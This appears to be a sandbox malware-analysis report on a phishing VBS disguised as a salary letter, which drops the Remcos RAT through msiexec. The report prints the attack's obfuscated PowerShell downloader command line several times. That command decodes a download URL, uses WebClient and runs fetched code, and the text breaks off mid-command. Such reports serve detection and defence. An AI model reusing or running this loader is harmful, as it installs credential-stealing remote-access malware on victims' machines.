              Source: bhvF097.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: bhvF097.tmp.10.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhvF097.tmp.10.drString found in binary or memory: https://www.office.com/
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041183A OpenClipboard,GetLastError,10_2_0041183A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,10_2_0040987A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004098E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_00406DFC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_00406E9F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004068B5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_004072B5

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3976, type: MEMORYSTR

              System Summary

              barindex
              Potential malicious VBS script found (suspicious strings)
              Source: Initial file: Call Caricologist.ShellExecute(Fluvious, Chr(34) & Angry & Chr(34), "", "", Indhftes)
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyGJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00401806 NtdllDefWindowProc_W,10_2_00401806
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004018C0 NtdllDefWindowProc_W,10_2_004018C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004016FD NtdllDefWindowProc_A,13_2_004016FD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004017B7 NtdllDefWindowProc_A,13_2_004017B7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3443B2762_2_00007FFD3443B276
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3443C0222_2_00007FFD3443C022
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD344339122_2_00007FFD34433912
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34434D082_2_00007FFD34434D08
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3443DB652_2_00007FFD3443DB65
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_223300817_2_22330081
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_223371947_2_22337194
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2232B5C17_2_2232B5C1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B04010_2_0044B040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043610D10_2_0043610D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044731010_2_00447310
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044A49010_2_0044A490
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040755A10_2_0040755A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043C56010_2_0043C560
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B61010_2_0044B610
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044D6C010_2_0044D6C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004476F010_2_004476F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B87010_2_0044B870
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044081D10_2_0044081D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041495710_2_00414957
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004079EE10_2_004079EE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00407AEB10_2_00407AEB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044AA8010_2_0044AA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00412AA910_2_00412AA9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404B7410_2_00404B74
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404B0310_2_00404B03
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044BBD810_2_0044BBD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404BE510_2_00404BE5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404C7610_2_00404C76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00415CFE10_2_00415CFE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00416D7210_2_00416D72
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00446D3010_2_00446D30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00446D8B10_2_00446D8B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00406E8F10_2_00406E8F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040503813_2_00405038
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041208C13_2_0041208C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004050A913_2_004050A9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040511A13_2_0040511A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0043C13A13_2_0043C13A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004051AB13_2_004051AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044930013_2_00449300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040D32213_2_0040D322
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044A4F013_2_0044A4F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0043A5AB13_2_0043A5AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041363113_2_00413631
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044669013_2_00446690
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044A73013_2_0044A730
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004398D813_2_004398D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004498E013_2_004498E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044A88613_2_0044A886
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0043DA0913_2_0043DA09
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00438D5E13_2_00438D5E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00449ED013_2_00449ED0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041FE8313_2_0041FE83
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00430F5413_2_00430F54
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004050C214_2_004050C2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004014AB14_2_004014AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040513314_2_00405133
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004051A414_2_004051A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040124614_2_00401246
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040CA4614_2_0040CA46
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040523514_2_00405235
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004032C814_2_004032C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040168914_2_00401689
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00402F6014_2_00402F60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
              Source: Salary Increase Letter_Oct 2024.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4947
              Source: unknownProcess created: Commandline size = 4947
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4947Jump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@18/10@2/3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,10_2_004182CE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,14_2_00410DE1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,10_2_00418758
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,10_2_00413D4C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,10_2_004148B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Lokumernes.susJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-KC5V8F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_by2ssk52.nr3.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
              Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=948
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4900
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: msiexec.exe, 00000007.00000002.3473023585.0000000022760000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: msiexec.exe, 0000000A.00000003.2635522754.0000000004F1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2643972273.0000000004F1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: Salary Increase Letter_Oct 2024.vbsVirustotal: Detection: 7%
              Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-33249
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU 